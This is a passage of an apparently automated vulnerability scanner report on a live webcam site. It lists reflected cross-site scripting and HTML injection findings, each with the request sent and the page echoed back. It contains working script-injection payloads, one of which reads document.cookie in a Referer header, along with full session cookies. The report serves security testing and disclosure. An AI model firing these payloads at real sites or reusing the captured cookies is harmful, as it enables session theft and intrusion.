The value of the redirect request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2a49'-alert(1)-'2edefc94fdc was submitted in the redirect parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /warningjx.aspx?redirect=/e2a49'-alert(1)-'2edefc94fdc HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:33 GMT
Connection: close
Content-Length: 2375
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="Head1"><title>
   War
...[SNIP]...
<script type="text/javascript">
function IAgree(){document.location.href='?meAgree=yes&redirect=%2fe2a49'-alert(1)-'2edefc94fdc'; return false;}
function IDontAgree() { window.parent.location.href = "/"; return false; }
</script>
...[SNIP]...

2.134. http://imlive.com/warningms.asp [ms parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5576b'><a>7cdefc4b49a was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?ms5576b'><a>7cdefc4b49a HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:12 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:11 GMT
Connection: close
Content-Length: 14486
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp?ms5576b'><a>7cdefc4b49a&lr=1107816008&ud=0&pe=warningms.asp&qs=ms5576b'>
...[SNIP]...

2.135. http://imlive.com/warningms.asp [ms parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The value of the ms request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a366"><a>e4ecb16fbac was submitted in the ms parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?ms9a366"><a>e4ecb16fbac HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:00 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:00 GMT
Connection: close
Content-Length: 14486
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<A HREF="/liveexperts.asp?ms9a366"><a>e4ecb16fbac">
...[SNIP]...

2.136. http://imlive.com/warningms.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /warningms.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d01b7'><a>ee151ed1363 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /warningms.asp?d01b7'><a>ee151ed1363=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Expires: Sat, 03 May 2008 14:24:56 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxgivxzPskYVay%2FvTxhkZKJA%3D%3D; path=/
Set-Cookie: ix=k; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:57 GMT
Connection: close
Content-Length: 14469
Vary: Accept-Encoding


<html>
<head>
<title>ImLive.com - warning </title>
</head>

<BODY bgcolor="#ffffff" topmargin=0 alink="#336699" vlink="#336699" link="#336699">
<center>
<script language="JavaScript" type="t
...[SNIP]...
<img border=0 name='an' src='http://analytic.imlive.com/w.gif?c=121273&he=imlive.com&ul=/warningms.asp?d01b7'><a>ee151ed1363=1&lr=1107816008&ud=0&pe=warningms.asp&qs=d01b7'>
...[SNIP]...

2.137. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-advanced-search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5982a'-alert(1)-'59971b4cff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:56 GMT
Connection: close
Content-Length: 75081
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/advancedsearch.aspx&he=imlive.com&ul=/webcam-advanced-search/?5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&qs=5982a'-alert(1)-'59971b4cff=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function ad
...[SNIP]...

2.138. http://imlive.com/webcam-advanced-search/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-advanced-search/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9af1e"><a>4c3fec81c51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-advanced-search/?9af1e"><a>4c3fec81c51=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhoqyccjVCXBTf954wWPYvp64MXC0Yh32GzThoTYj52vyg%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:53 GMT
Connection: close
Content-Length: 74955
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-advanced-search/?9af1e"><a>4c3fec81c51=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.139. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c57b4'-alert(1)-'0e1cfcefff7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:52 GMT
Connection: close
Content-Length: 44471
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816009&ud=0&pe=/faq_m1.aspx&he=imlive.com&ul=/webcam-faq/?c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&qs=c57b4'-alert(1)-'0e1cfcefff7=1&bd=2257113033&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=634e080d-5096-47be-904e-bbc9d7c9c04d&ld=701';}catch(e){};function
...[SNIP]...

2.140. http://imlive.com/webcam-faq/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /webcam-faq/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5762"><a>e3b37a89d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /webcam-faq/?a5762"><a>e3b37a89d43=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlL8zTIvtVwW0CVpow8AMrdLugZEgxQ5mlqNWj%2fLeLiSgb6C8QbuYpr0yEhAKPyf6Rc%3d; BIGipServerImlive=2434008642.20480.0000; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; spvdr=vd=634e080d-5096-47be-904e-bbc9d7c9c04d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmb=71081352.1.10.1296223202; ASP.NET_SessionId=gxyqyk5513czde45c0k3d2vq;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsrv49
Date: Fri, 28 Jan 2011 14:11:51 GMT
Connection: close
Content-Length: 44322
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/webcam-faq/?a5762"><a>e3b37a89d43=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.141. http://imlive.com/webcam-login/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /webcam-login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a901'-alert(1)-'19762fb72eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /webcam-login/?6a901'-alert(1)-'19762fb72eb=1 HTTP/1.1
Host: imlive.com
Proxy-Connection: keep-alive
Referer: http://imlive.com/homepagems3.asp244f6%27%3e%3cscript%3ealert%28document.cookie%29%3c%2fscript%3e7358040fd9f
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=k; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; BIGipServerImlive=2417231426.20480.0000; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2BBy1VYBI3pSkXNUqoKMA%2F5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIABZp7bjF8LU1IEQJF74sqFIqK%2FrSJLJIAqaJZ0edqc48maagLObAFtqg%2B4Ftnp8FL%2BEEt6dOh7Qo8D0WGpZyxmtFNd8v%2FP4CLv2bTBWZOitK; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; __utmb=71081352.4.10.1296223202

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ix=s; path=/
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0aL3siby47TA1QT7oGe%2b8%2b0HFAu%2bfqcO77Lbk%2bAmjH%2bK; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:17:22 GMT
Vary: Accept-Encoding
Connection: Keep-Alive
Content-Length: 22258


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
